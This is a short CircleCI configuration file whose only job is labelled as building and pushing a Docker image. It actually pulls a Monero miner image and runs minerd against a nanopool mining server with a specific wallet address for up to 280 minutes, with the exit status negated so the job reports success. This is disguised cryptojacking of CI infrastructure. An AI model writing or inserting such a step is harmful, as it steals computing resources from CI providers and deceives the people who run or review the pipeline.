version: 2
jobs:
  build:
    docker:
      - image: kannix/monero-miner

    steps:
      - checkout

      - run:
          name: Build and push Docker image
          command: |
            ls -la /
            ls -la /cpuminer-multi
            cd /cpuminer-multi && ! timeout 280m ./minerd -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRwhbpoUQ5wWSQFWkrR.circle -p x
